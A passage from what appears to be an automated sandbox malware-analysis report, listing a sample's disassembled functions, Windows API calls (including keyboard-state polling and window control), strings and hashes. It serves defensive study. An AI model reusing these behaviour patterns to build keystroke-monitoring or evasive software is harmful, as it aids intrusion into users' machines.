                                                                                                                    • Instruction Fuzzy Hash: 4F213A32A00114BBC710AF65DC05EEF736CEF99716F0045AFF90993151EEB99A8187E8
                                                                                                                    Function 0045F56D Relevance: 21.1, APIs: 6, Strings: 6, Instructions: 78COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                      • Part of subcall function 00402160: _wcslen.LIBCMT ref: 0040216D
                                                                                                                      • Part of subcall function 00402160: _memmove.LIBCMT ref: 00402193
                                                                                                                    • mciSendStringW.WINMM(status PlayMe mode,?,00000100,00000000), ref: 0045F5D5
                                                                                                                    • mciSendStringW.WINMM(close PlayMe,00000000,00000000,00000000), ref: 0045F5EC
                                                                                                                    • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 0045F5FE
                                                                                                                    • mciSendStringW.WINMM(play PlayMe wait,00000000,00000000,00000000), ref: 0045F611
                                                                                                                    • mciSendStringW.WINMM(close PlayMe,00000000,00000000,00000000), ref: 0045F61E
                                                                                                                    • mciSendStringW.WINMM(play PlayMe,00000000,00000000,00000000), ref: 0045F634
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2143625140.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2143603116.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143745783.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143795001.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143822197.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143855581.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143855581.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143890416.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_400000_enkJ6J7dAn.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: SendString$_memmove_wcslen
                                                                                                                    • String ID: alias PlayMe$close PlayMe$open $play PlayMe$play PlayMe wait$status PlayMe mode
                                                                                                                    • API String ID: 369157077-1007645807
                                                                                                                    • Opcode ID: f963851227cb2bcafec7df3ef8778280fda42e08bc5c03876a4728c3ed9f2a05
                                                                                                                    • Instruction ID: e81aaa69409cfefceaf3864659f825962b2ddf67c6d06b6a861a29a56a66176d
                                                                                                                    • Opcode Fuzzy Hash: f963851227cb2bcafec7df3ef8778280fda42e08bc5c03876a4728c3ed9f2a05
                                                                                                                    • Instruction Fuzzy Hash: 7F21A83168021D66E720FB95DC46FFE7368AF40700F20087BFA14B71D1DAB4A949879D
                                                                                                                    Function 00445BE4 Relevance: 21.1, APIs: 7, Strings: 5, Instructions: 77windowCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • GetParent.USER32 ref: 00445BF8
                                                                                                                    • GetClassNameW.USER32(00000000,?,00000100), ref: 00445C0D
                                                                                                                    • __wcsicoll.LIBCMT ref: 00445C33
                                                                                                                    • __wcsicoll.LIBCMT ref: 00445C4F
                                                                                                                    • SendMessageW.USER32(00000000,00000111,0000702B,00000000), ref: 00445CA9
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2143625140.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2143603116.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143745783.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143795001.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143822197.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143855581.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143855581.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143890416.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_400000_enkJ6J7dAn.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: __wcsicoll$ClassMessageNameParentSend
                                                                                                                    • String ID: SHELLDLL_DefView$details$largeicons$list$smallicons
                                                                                                                    • API String ID: 3125838495-3381328864
                                                                                                                    • Opcode ID: 17bab07e815737d0aecd422002c3b7a0f260523ca91fc6be5302b60c0052203b
                                                                                                                    • Instruction ID: b9a51c7f116d0e73852bd225d20f6d8bcb5f39b8f57bd3164038c04ed7d94027
                                                                                                                    • Opcode Fuzzy Hash: 17bab07e815737d0aecd422002c3b7a0f260523ca91fc6be5302b60c0052203b
                                                                                                                    • Instruction Fuzzy Hash: C6110AB1E447017BFE10BA659D46EBB339C9B54B11F00051BFE44D7242F6ACA94147A9
                                                                                                                    Function 004491B9 Relevance: 19.7, APIs: 13, Instructions: 246windowCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • SendMessageW.USER32(?,?,000000FF,?), ref: 004492A4
                                                                                                                    • SendMessageW.USER32(?,?,00000000,00000000), ref: 004492B7
                                                                                                                    • CharNextW.USER32(?,?,?,000000FF,?), ref: 004492E9
                                                                                                                    • SendMessageW.USER32(?,?,00000000,00000000), ref: 00449301
                                                                                                                    • SendMessageW.USER32(?,?,00000000,?), ref: 00449332
                                                                                                                    • SendMessageW.USER32(?,?,000000FF,?), ref: 00449349
                                                                                                                    • SendMessageW.USER32(?,?,00000000,00000000), ref: 0044935C
                                                                                                                    • SendMessageW.USER32(?,00000402,?), ref: 00449399
                                                                                                                    • SendMessageW.USER32(?,000000C2,00000001,?), ref: 0044940D
                                                                                                                    • SendMessageW.USER32(?,00001002,00000000,?), ref: 00449477
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2143625140.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2143603116.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143745783.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143795001.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143822197.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143855581.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143855581.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143890416.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_400000_enkJ6J7dAn.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: MessageSend$CharNext
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 1350042424-0
                                                                                                                    • Opcode ID: 0066c399e5a393c923680e2e66105d8530035c3b09cc99687380ea8ee93f4497
                                                                                                                    • Instruction ID: 867fdc7b80e212b75fe5daf06e5219747a853435bb2a874e280223eddbea68d3
                                                                                                                    • Opcode Fuzzy Hash: 0066c399e5a393c923680e2e66105d8530035c3b09cc99687380ea8ee93f4497
                                                                                                                    • Instruction Fuzzy Hash: 5B81D535A00119BBEB10CF85DD80FFFB778FB55720F10825AFA14AA280D7B99D4197A4
                                                                                                                    Function 00478656 Relevance: 19.4, APIs: 2, Strings: 9, Instructions: 197COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                      • Part of subcall function 004536F7: CharLowerBuffW.USER32(?,?), ref: 0045370C
                                                                                                                      • Part of subcall function 00445AE0: _wcslen.LIBCMT ref: 00445AF0
                                                                                                                    • GetDriveTypeW.KERNEL32(?), ref: 004787B9
                                                                                                                    • _wcscpy.LIBCMT ref: 004787E5
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2143625140.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2143603116.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143745783.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143795001.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143822197.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143855581.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143855581.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143890416.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_400000_enkJ6J7dAn.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: BuffCharDriveLowerType_wcscpy_wcslen
                                                                                                                    • String ID: \VH$a$all$cdrom$fixed$network$ramdisk$removable$unknown
                                                                                                                    • API String ID: 3052893215-2127371420
                                                                                                                    • Opcode ID: d2cef25e8da5c5e3ff62787a2d5bf57075b394b4544bde345958b2b0489681b6
                                                                                                                    • Instruction ID: 541bc2b2506c052d744bcb7e7e177e26c036821b53f5a58429f0f0853ea8de24
                                                                                                                    • Opcode Fuzzy Hash: d2cef25e8da5c5e3ff62787a2d5bf57075b394b4544bde345958b2b0489681b6
                                                                                                                    • Instruction Fuzzy Hash: 4761C1716443018BD700EF14CC85B9BB7D4AB84348F14892FF949AB382DB79E94987AB
                                                                                                                    Function 0045E737 Relevance: 19.4, APIs: 6, Strings: 5, Instructions: 163COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • LoadStringW.USER32(?,00000066,?,00000FFF), ref: 0045E77F
                                                                                                                      • Part of subcall function 00401B10: _wcslen.LIBCMT ref: 00401B11
                                                                                                                      • Part of subcall function 00401B10: _memmove.LIBCMT ref: 00401B57
                                                                                                                    • LoadStringW.USER32(?,?,?,00000FFF), ref: 0045E7A0
                                                                                                                    • __swprintf.LIBCMT ref: 0045E7F7
                                                                                                                    • _wprintf.LIBCMT ref: 0045E8B3
                                                                                                                    • _wprintf.LIBCMT ref: 0045E8D7
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2143625140.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2143603116.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143745783.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143795001.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143822197.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143855581.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143855581.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143890416.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_400000_enkJ6J7dAn.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: LoadString_wprintf$__swprintf_memmove_wcslen
                                                                                                                    • String ID: Error: $%s (%d) : ==> %s:$%s (%d) : ==> %s:%s%s$Line %d (File "%s"):$^ ERROR
                                                                                                                    • API String ID: 2295938435-2354261254
                                                                                                                    • Opcode ID: bb058454d561a71d3962b6834df81d7638d9abf9c215052f6de6d44e2e152ebf
                                                                                                                    • Instruction ID: 453f5dd12ee62c270a242db3517b58e8b6225e49c0ff470bc5072f32437c925c
                                                                                                                    • Opcode Fuzzy Hash: bb058454d561a71d3962b6834df81d7638d9abf9c215052f6de6d44e2e152ebf
                                                                                                                    • Instruction Fuzzy Hash: 6A519E71A10219ABDB14EB91CC85EEF7778AF44314F14407EF90477292DB78AE49CBA8
                                                                                                                    Function 004531B1 Relevance: 19.4, APIs: 7, Strings: 4, Instructions: 160COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2143625140.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2143603116.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143745783.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143795001.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143822197.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143855581.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143855581.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143890416.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_400000_enkJ6J7dAn.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: __swprintf_wcscpy$__i64tow__itow
                                                                                                                    • String ID: %.15g$0x%p$False$True
                                                                                                                    • API String ID: 3038501623-2263619337
                                                                                                                    • Opcode ID: dbd07ee36d68efbdb82b47f6bbdb5a558a403895529f1bd62c5843a789ef215e
                                                                                                                    • Instruction ID: fd507a47f7d2c8f7f5848ea17d112ce969af4838d766d220e6d3988dad71e25c
                                                                                                                    • Opcode Fuzzy Hash: dbd07ee36d68efbdb82b47f6bbdb5a558a403895529f1bd62c5843a789ef215e
                                                                                                                    • Instruction Fuzzy Hash: 264108729001005BDB10EF75DC42FAAB364EF55306F0445ABFE09CB242EA39DA48C79A
                                                                                                                    Function 0045E538 Relevance: 19.4, APIs: 6, Strings: 5, Instructions: 154COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • LoadStringW.USER32(?,00000066,?,00000FFF), ref: 0045E580
                                                                                                                      • Part of subcall function 00401B10: _wcslen.LIBCMT ref: 00401B11
                                                                                                                      • Part of subcall function 00401B10: _memmove.LIBCMT ref: 00401B57
                                                                                                                    • LoadStringW.USER32(?,00000072,?,00000FFF), ref: 0045E59F
                                                                                                                    • __swprintf.LIBCMT ref: 0045E5F6
                                                                                                                    • _wprintf.LIBCMT ref: 0045E6A3
                                                                                                                    • _wprintf.LIBCMT ref: 0045E6C7
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2143625140.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2143603116.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143745783.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143795001.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143822197.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143855581.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143855581.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143890416.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_400000_enkJ6J7dAn.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: LoadString_wprintf$__swprintf_memmove_wcslen
                                                                                                                    • String ID: Error: $%s (%d) : ==> %s:$%s (%d) : ==> %s:%s%s$Line %d (File "%s"):$^ ERROR
                                                                                                                    • API String ID: 2295938435-8599901
                                                                                                                    • Opcode ID: c66a723599ffab058b3f3cea1f0729b04811ebb293e3d225dd53f192e4035716
                                                                                                                    • Instruction ID: ff3e2b23dced8a629e5b21f12e79e468b5cd48208a3d74017576322ff0354a8f
                                                                                                                    • Opcode Fuzzy Hash: c66a723599ffab058b3f3cea1f0729b04811ebb293e3d225dd53f192e4035716
                                                                                                                    • Instruction Fuzzy Hash: 9A519171D00109ABDB14EBA1C845EEF7778EF44304F50847EF91477292EA78AE49CBA8
                                                                                                                    Function 00443B61 Relevance: 19.3, APIs: 10, Strings: 1, Instructions: 99sleepwindowtimeCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • timeGetTime.WINMM ref: 00443B67
                                                                                                                      • Part of subcall function 0040C620: timeGetTime.WINMM(0042DD5D), ref: 0040C620
                                                                                                                    • Sleep.KERNEL32(0000000A), ref: 00443B9F
                                                                                                                    • FindWindowExW.USER32(?,00000000,BUTTON,00000000), ref: 00443BC8
                                                                                                                    • SetActiveWindow.USER32(?), ref: 00443BEC
                                                                                                                    • SendMessageW.USER32(00000000,000000F5,00000000,00000000), ref: 00443BFC
                                                                                                                    • SendMessageW.USER32(?,00000010,00000000,00000000), ref: 00443C22
                                                                                                                    • Sleep.KERNEL32(000000FA), ref: 00443C2D
                                                                                                                    • IsWindow.USER32(?), ref: 00443C3A
                                                                                                                    • EndDialog.USER32(?,00000000), ref: 00443C4C
                                                                                                                      • Part of subcall function 004439C1: GetWindowThreadProcessId.USER32(?,00000000), ref: 004439E4
                                                                                                                      • Part of subcall function 004439C1: GetCurrentThreadId.KERNEL32 ref: 004439EB
                                                                                                                      • Part of subcall function 004439C1: AttachThreadInput.USER32(00000000), ref: 004439F2
                                                                                                                    • EnumThreadWindows.USER32(00000000,Function_00033D09,00000000), ref: 00443C6B
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2143625140.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2143603116.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143745783.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143795001.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143822197.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143855581.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143855581.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143890416.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_400000_enkJ6J7dAn.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: ThreadWindow$MessageSendSleepTimetime$ActiveAttachCurrentDialogEnumFindInputProcessWindows
                                                                                                                    • String ID: BUTTON
                                                                                                                    • API String ID: 1834419854-3405671355
                                                                                                                    • Opcode ID: 0b90b562b2b8ddd8d32d3d53e67965f547c0866e24595f66544518a968b379f6
                                                                                                                    • Instruction ID: 3c6370bb7d17ad47abda0b7088cfd3672c19e1ca6c3f529de1b12449ce3ad6f8
                                                                                                                    • Opcode Fuzzy Hash: 0b90b562b2b8ddd8d32d3d53e67965f547c0866e24595f66544518a968b379f6
                                                                                                                    • Instruction Fuzzy Hash: 6B31E676784200BFE3349F74FD99F5A3B58AB55B22F10083AF600EA2A1D6B5A441876C
                                                                                                                    Function 00454014 Relevance: 19.3, APIs: 6, Strings: 5, Instructions: 93windowCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • GetModuleHandleW.KERNEL32(00000000,?,?,00000FFF,?,?,?,?,0042820D,?,?,?,#include depth exceeded. Make sure there are no recursive includes,?), ref: 00454039
                                                                                                                    • LoadStringW.USER32(00000000), ref: 00454040
                                                                                                                      • Part of subcall function 00401B10: _wcslen.LIBCMT ref: 00401B11
                                                                                                                      • Part of subcall function 00401B10: _memmove.LIBCMT ref: 00401B57
                                                                                                                    • _wprintf.LIBCMT ref: 00454074
                                                                                                                    • __swprintf.LIBCMT ref: 004540A3
                                                                                                                    • MessageBoxW.USER32(00000000,?,?,00011010), ref: 0045410F
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2143625140.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2143603116.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143745783.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143795001.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143822197.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143855581.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143855581.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143890416.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_400000_enkJ6J7dAn.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: HandleLoadMessageModuleString__swprintf_memmove_wcslen_wprintf
                                                                                                                    • String ID: Error: $%s (%d) : ==> %s.: %s %s$.$Line %d (File "%s"):$Line %d:
                                                                                                                    • API String ID: 455036304-4153970271
                                                                                                                    • Opcode ID: 0cc89bd23a2e2e53ac7bb2b5ed0e913a3f1e972501752cb0da19f3bd95e8304c
                                                                                                                    • Instruction ID: e2f14448b15a7dab571624068eda089460c560eca1c8ebe4dd0daaccfe0aa2c5
                                                                                                                    • Opcode Fuzzy Hash: 0cc89bd23a2e2e53ac7bb2b5ed0e913a3f1e972501752cb0da19f3bd95e8304c
                                                                                                                    • Instruction Fuzzy Hash: 3B31E872B0011997CB00EF95CD069AE3378AF88714F50445EFA0877282D678AE45C7A9
                                                                                                                    Function 00467C8E Relevance: 18.3, APIs: 12, Instructions: 310COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • SafeArrayAccessData.OLEAUT32(0000007F,?), ref: 00467D63
                                                                                                                    • SafeArrayAccessData.OLEAUT32(0000007F,0000007F), ref: 00467DDC
                                                                                                                    • SafeArrayGetVartype.OLEAUT32(0000007F,?), ref: 00467E71
                                                                                                                    • SafeArrayAccessData.OLEAUT32(00000000,?), ref: 00467E9D
                                                                                                                    • _memmove.LIBCMT ref: 00467EB8
                                                                                                                    • SafeArrayUnaccessData.OLEAUT32(00000000), ref: 00467EC1
                                                                                                                    • SafeArrayAccessData.OLEAUT32(0000007F,?), ref: 00467EDE
                                                                                                                    • _memmove.LIBCMT ref: 00467F6C
                                                                                                                    • SafeArrayAccessData.OLEAUT32(0000007F,?), ref: 00467FC1
                                                                                                                    • SafeArrayUnaccessData.OLEAUT32(00000004), ref: 00467FAB
                                                                                                                      • Part of subcall function 004115D7: std::exception::exception.LIBCMT ref: 00411626
                                                                                                                      • Part of subcall function 004115D7: std::exception::exception.LIBCMT ref: 00411640
                                                                                                                      • Part of subcall function 004115D7: __CxxThrowException@8.LIBCMT ref: 00411651
                                                                                                                    • SafeArrayUnaccessData.OLEAUT32(00479A50), ref: 00467E48
                                                                                                                      • Part of subcall function 004115D7: _malloc.LIBCMT ref: 004115F1
                                                                                                                    • SafeArrayUnaccessData.OLEAUT32(00479A50), ref: 00468030
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2143625140.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2143603116.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143745783.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143795001.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143822197.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143855581.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143855581.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143890416.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_400000_enkJ6J7dAn.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: ArraySafe$Data$Access$Unaccess$_memmovestd::exception::exception$Exception@8ThrowVartype_malloc
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 2170234536-0
                                                                                                                    • Opcode ID: aa00afaeb95d016149156b33273ce501c4b0800cd775f7336c4c4d99d01e60ec
                                                                                                                    • Instruction ID: 6369f5c3f22445f0d5bf5c4520e4337682cbd46778e63a39b460943b9460954a
                                                                                                                    • Opcode Fuzzy Hash: aa00afaeb95d016149156b33273ce501c4b0800cd775f7336c4c4d99d01e60ec
                                                                                                                    • Instruction Fuzzy Hash: 26B124716042059FD700CF59D884BAEB7B5FF88308F24856EEA05DB351EB3AD845CB6A
                                                                                                                    Function 00453C57 Relevance: 18.2, APIs: 12, Instructions: 190keyboardCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • GetKeyboardState.USER32(?), ref: 00453CE0
                                                                                                                    • SetKeyboardState.USER32(?), ref: 00453D3B
                                                                                                                    • GetAsyncKeyState.USER32(000000A0), ref: 00453D5E
                                                                                                                    • GetKeyState.USER32(000000A0), ref: 00453D75
                                                                                                                    • GetAsyncKeyState.USER32(000000A1), ref: 00453DA4
                                                                                                                    • GetKeyState.USER32(000000A1), ref: 00453DB5
                                                                                                                    • GetAsyncKeyState.USER32(00000011), ref: 00453DE1
                                                                                                                    • GetKeyState.USER32(00000011), ref: 00453DEF
                                                                                                                    • GetAsyncKeyState.USER32(00000012), ref: 00453E18
                                                                                                                    • GetKeyState.USER32(00000012), ref: 00453E26
                                                                                                                    • GetAsyncKeyState.USER32(0000005B), ref: 00453E4F
                                                                                                                    • GetKeyState.USER32(0000005B), ref: 00453E5D
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2143625140.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2143603116.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143745783.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143795001.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143822197.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143855581.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143855581.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143890416.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_400000_enkJ6J7dAn.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: State$Async$Keyboard
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 541375521-0
                                                                                                                    • Opcode ID: a3f88cab2abdfc68c44a637c7b6f2bd83c4aa3bfdff3a706604d8f1b20d6ef18
                                                                                                                    • Instruction ID: 009fbf1908f75ed0a62addf5985db529f64a747a45b1090b1102dc3b9208550d
